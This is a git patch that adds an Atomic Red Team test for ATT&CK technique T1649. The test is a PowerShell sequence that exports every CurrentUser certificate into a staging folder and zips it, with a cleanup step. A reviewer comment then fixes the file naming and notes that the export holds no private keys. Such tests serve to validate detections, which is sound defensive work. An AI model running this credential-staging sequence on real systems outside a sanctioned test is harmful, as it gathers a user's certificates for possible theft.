From 4759bb96c79aba4fc16b135bf4ddc6f0e9e56c20 Mon Sep 17 00:00:00 2001
From: 0xv1n <11021725+0xv1n@users.noreply.github.com>
Date: Mon, 24 Apr 2023 20:35:54 -0400
Subject: [PATCH] T1649 Test (#2400)

* t1649

* Update T1649.yaml

* simplification and create directories

---------

Co-authored-by: Carrie Roberts
---
 atomics/T1649/T1649.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 atomics/T1649/T1649.yaml

diff --git a/atomics/T1649/T1649.yaml b/atomics/T1649/T1649.yaml
new file mode 100644
index 00000000..30dc7ad8
--- /dev/null
+++ b/atomics/T1649/T1649.yaml
@@ -0,0 +1,21 @@
+attack_technique: T1649
+display_name: 'Steal or Forge Authentication Certificates'
+atomic_tests:
+- name: Staging Local Certificates via Export-Certificate
+  description: |
+    Export all user certificates and add to a compressed archive.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $archive="$env:PUBLIC\T1649\atomic_certs.zip"
+      $exfilpath="$env:PUBLIC\T1649\certs"
+      Add-Type -assembly "system.io.compression.filesystem"
+      Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
+      mkdir $exfilpath | Out-Null
+      foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath $exfilpath\$($cert.FriendlyName).cer}
+      [io.compression.zipfile]::CreateFromDirectory($exfilpath, $archive)
+    cleanup_command: |
+      $exfilpath="$env:PUBLIC\T1649\certs"
+      Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
+    name: powershell
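Review bot: The export file name in the `foreach` line is built from `$cert.FriendlyName`, which is frequently empty and is not unique, so every certificate without a friendly name targets the same `certs\.cer` path and the staged archive ends up holding only one of them; a friendly name containing characters that are illegal in a path would also make that iteration fail. The thumbprint is unique and path-safe, so I would change that line to `foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath "$exfilpath\$($cert.Thumbprint).cer" }`. Separately, as far as I can tell `Export-Certificate` without a `-Type` argument writes only the DER-encoded public certificate, so the archive never contains private keys; the description should say so, e.g. `Export the public portion of all CurrentUser\My certificates (no private keys) and add them to a compressed archive.`, so that anyone using this to validate detections for T1649 knows it emulates the staging step rather than key theft.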